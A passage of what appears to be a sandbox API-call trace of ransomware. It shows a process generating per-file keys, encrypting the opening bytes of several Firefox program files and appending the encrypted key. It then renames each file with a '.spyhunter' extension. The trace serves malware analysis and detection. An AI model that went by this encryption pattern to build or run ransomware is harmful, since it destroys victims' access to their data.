dwFlags=0x0, lpMem=0x2ec12b0 | out: hHeap=0x2c0000) returned 1 [0163.050] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e748 | out: pbBuffer=0x248e748) returned 1 [0163.051] GetProcessHeap () returned 0x2c0000 [0163.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.051] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e740*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e740*=0x30) returned 1 [0163.051] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.054] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll") returned 55 [0163.054] StrStrW (lpFirst="msvcr100.dll", lpSrch=".txt") returned 0x0 [0163.055] GetProcessHeap () returned 0x2c0000 [0163.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0163.055] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e704, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e704*=0x2800, lpOverlapped=0x0) returned 1 [0163.103] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.103] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e704, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e704*=0x2800, lpOverlapped=0x0) returned 1 [0163.104] GetProcessHeap () returned 0x2c0000 [0163.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0163.104] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.104] WriteFile (in: hFile=0xa0, lpBuffer=0x248e744*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e704, lpOverlapped=0x0 | out: lpBuffer=0x248e744*, lpNumberOfBytesWritten=0x248e704*=0x4, lpOverlapped=0x0) returned 1 [0163.342] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e704, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e704*=0x30, lpOverlapped=0x0) returned 1 [0163.342] CloseHandle (hObject=0xa0) returned 1 [0163.342] GetProcessHeap () returned 0x2c0000 [0163.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.343] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll.spyhunter") returned 65 [0163.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcr100.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcr100.dll.spyhunter")) returned 1 [0163.344] GetProcessHeap () returned 0x2c0000 [0163.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.344] GetProcessHeap () returned 0x2c0000 [0163.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.344] GetProcessHeap () returned 0x2c0000 [0163.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1140 | out: hHeap=0x2c0000) returned 1 [0163.344] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e748 | out: pbBuffer=0x248e748) returned 1 [0163.344] GetProcessHeap () returned 0x2c0000 [0163.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.344] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e740*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e740*=0x30) returned 1 [0163.344] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozglue.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.346] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll") returned 54 [0163.346] StrStrW (lpFirst="mozglue.dll", lpSrch=".txt") returned 0x0 [0163.346] GetProcessHeap () returned 0x2c0000 [0163.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0163.346] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e704, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e704*=0x2800, lpOverlapped=0x0) returned 1 [0163.404] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.404] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e704, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e704*=0x2800, lpOverlapped=0x0) returned 1 [0163.405] GetProcessHeap () returned 0x2c0000 [0163.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0163.405] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.405] WriteFile (in: hFile=0xa0, lpBuffer=0x248e744*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e704, lpOverlapped=0x0 | out: lpBuffer=0x248e744*, lpNumberOfBytesWritten=0x248e704*=0x4, lpOverlapped=0x0) returned 1 [0163.464] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e704, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e704*=0x30, lpOverlapped=0x0) returned 1 [0163.465] CloseHandle (hObject=0xa0) returned 1 [0163.465] GetProcessHeap () returned 0x2c0000 [0163.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.465] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll.spyhunter") returned 64 [0163.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozglue.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozglue.dll.spyhunter")) returned 1 [0163.466] GetProcessHeap () returned 0x2c0000 [0163.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.466] GetProcessHeap () returned 0x2c0000 [0163.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.466] GetProcessHeap () returned 0x2c0000 [0163.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0f18 | out: hHeap=0x2c0000) returned 1 [0163.466] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e740 | out: pbBuffer=0x248e740) returned 1 [0163.466] GetProcessHeap () returned 0x2c0000 [0163.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.466] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e738*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e738*=0x30) returned 1 [0163.466] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozalloc.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozalloc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.468] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozalloc.dll") returned 55 [0163.468] StrStrW (lpFirst="mozalloc.dll", lpSrch=".txt") returned 0x0 [0163.468] GetProcessHeap () returned 0x2c0000 [0163.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0163.468] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e6fc*=0x2800, lpOverlapped=0x0) returned 1 [0163.469] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.469] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e6fc*=0x2800, lpOverlapped=0x0) returned 1 [0163.469] GetProcessHeap () returned 0x2c0000 [0163.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0163.470] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.470] WriteFile (in: hFile=0xa0, lpBuffer=0x248e73c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6fc, lpOverlapped=0x0 | out: lpBuffer=0x248e73c*, lpNumberOfBytesWritten=0x248e6fc*=0x4, lpOverlapped=0x0) returned 1 [0163.542] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6fc*=0x30, lpOverlapped=0x0) returned 1 [0163.543] CloseHandle (hObject=0xa0) returned 1 [0163.543] GetProcessHeap () returned 0x2c0000 [0163.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.543] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozalloc.dll.spyhunter") returned 65 [0163.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozalloc.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozalloc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\mozalloc.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozalloc.dll.spyhunter")) returned 1 [0163.544] GetProcessHeap () returned 0x2c0000 [0163.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.544] GetProcessHeap () returned 0x2c0000 [0163.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.544] GetProcessHeap () returned 0x2c0000 [0163.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0e60 | out: hHeap=0x2c0000) returned 1 [0163.544] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e740 | out: pbBuffer=0x248e740) returned 1 [0163.544] GetProcessHeap () returned 0x2c0000 [0163.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.544] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e738*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e738*=0x30) returned 1 [0163.544] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.545] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice.exe") returned 65 [0163.545] StrStrW (lpFirst="maintenanceservice.exe", lpSrch=".txt") returned 0x0 [0163.545] GetProcessHeap () returned 0x2c0000 [0163.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0163.545] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e6fc*=0x2800, lpOverlapped=0x0) returned 1 [0163.673] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.673] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e6fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e6fc*=0x2800, lpOverlapped=0x0) returned 1 [0163.673] GetProcessHeap () returned 0x2c0000 [0163.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0163.673] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.673] WriteFile (in: hFile=0xa0, lpBuffer=0x248e73c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6fc, lpOverlapped=0x0 | out: lpBuffer=0x248e73c*, lpNumberOfBytesWritten=0x248e6fc*=0x4, lpOverlapped=0x0) returned 1 [0163.758] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6fc*=0x30, lpOverlapped=0x0) returned 1 [0163.758] CloseHandle (hObject=0xa0) returned 1 [0163.758] GetProcessHeap () returned 0x2c0000 [0163.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.759] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice.exe.spyhunter") returned 75 [0163.759] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice.exe.spyhunter")) returned 1 [0163.759] GetProcessHeap () returned 0x2c0000 [0163.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.759] GetProcessHeap () returned 0x2c0000 [0163.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.760] GetProcessHeap () returned 0x2c0000 [0163.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e068d8 | out: hHeap=0x2c0000) returned 1 [0163.761] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e738 | out: pbBuffer=0x248e738) returned 1 [0163.761] GetProcessHeap () returned 0x2c0000 [0163.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.761] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e730*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e730*=0x30) returned 1 [0163.761] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.761] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll") returned 54 [0163.761] StrStrW (lpFirst="freebl3.dll", lpSrch=".txt") returned 0x0 [0163.761] GetProcessHeap () returned 0x2c0000 [0163.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0163.761] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e6f4*=0x2800, lpOverlapped=0x0) returned 1 [0163.779] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.779] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e6f4*=0x2800, lpOverlapped=0x0) returned 1 [0163.779] GetProcessHeap () returned 0x2c0000 [0163.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0163.779] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.779] WriteFile (in: hFile=0xa0, lpBuffer=0x248e734*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6f4, lpOverlapped=0x0 | out: lpBuffer=0x248e734*, lpNumberOfBytesWritten=0x248e6f4*=0x4, lpOverlapped=0x0) returned 1 [0163.805] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6f4*=0x30, lpOverlapped=0x0) returned 1 [0163.805] CloseHandle (hObject=0xa0) returned 1 [0163.806] GetProcessHeap () returned 0x2c0000 [0163.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.806] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll.spyhunter") returned 64 [0163.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll.spyhunter")) returned 1 [0163.806] GetProcessHeap () returned 0x2c0000 [0163.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.806] GetProcessHeap () returned 0x2c0000 [0163.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.806] GetProcessHeap () returned 0x2c0000 [0163.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0ac8 | out: hHeap=0x2c0000) returned 1 [0163.807] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e738 | out: pbBuffer=0x248e738) returned 1 [0163.807] GetProcessHeap () returned 0x2c0000 [0163.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.807] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e730*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e730*=0x30) returned 1 [0163.807] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.aff" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.aff"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.807] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.aff") returned 65 [0163.807] StrStrW (lpFirst="en-US.aff", lpSrch=".txt") returned 0x0 [0163.807] GetProcessHeap () returned 0x2c0000 [0163.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0163.807] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e6f4*=0xcca, lpOverlapped=0x0) returned 1 [0163.808] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff336, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.809] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xcca, lpNumberOfBytesWritten=0x248e6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e6f4*=0xcca, lpOverlapped=0x0) returned 1 [0163.809] GetProcessHeap () returned 0x2c0000 [0163.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0163.809] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.809] WriteFile (in: hFile=0xa0, lpBuffer=0x248e734*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6f4, lpOverlapped=0x0 | out: lpBuffer=0x248e734*, lpNumberOfBytesWritten=0x248e6f4*=0x4, lpOverlapped=0x0) returned 1 [0163.809] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e6f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e6f4*=0x30, lpOverlapped=0x0) returned 1 [0163.809] CloseHandle (hObject=0xa0) returned 1 [0163.809] GetProcessHeap () returned 0x2c0000 [0163.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.809] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.aff.spyhunter") returned 75 [0163.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.aff" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.aff"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dictionaries\\en-US.aff.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\dictionaries\\en-us.aff.spyhunter")) returned 1 [0163.811] GetProcessHeap () returned 0x2c0000 [0163.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.811] GetProcessHeap () returned 0x2c0000 [0163.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.811] GetProcessHeap () returned 0x2c0000 [0163.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06738 | out: hHeap=0x2c0000) returned 1 [0163.811] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e730 | out: pbBuffer=0x248e730) returned 1 [0163.811] GetProcessHeap () returned 0x2c0000 [0163.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0163.812] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e728*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e728*=0x30) returned 1 [0163.812] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0163.812] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list") returned 61 [0163.812] StrStrW (lpFirst="dependentlibs.list", lpSrch=".txt") returned 0x0 [0163.812] GetProcessHeap () returned 0x2c0000 [0163.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0163.812] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e6ec*=0x63, lpOverlapped=0x0) returned 1 [0163.813] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff9d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.813] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x63, lpNumberOfBytesWritten=0x248e6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e6ec*=0x63, lpOverlapped=0x0) returned 1 [0163.813] GetProcessHeap () returned 0x2c0000 [0163.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0163.813] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.814] WriteFile (in: hFile=0xa0, lpBuffer=0x248e72c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e6ec, lpOverlapped=0x0 | out: lpBuffer=0x248e72c*, lpNumberOfBytesWritten=0x248e6ec*=0x4, lpOverlapped=0x0) returned 1 [0163.814] WriteFile (in: hFile=0xa0, 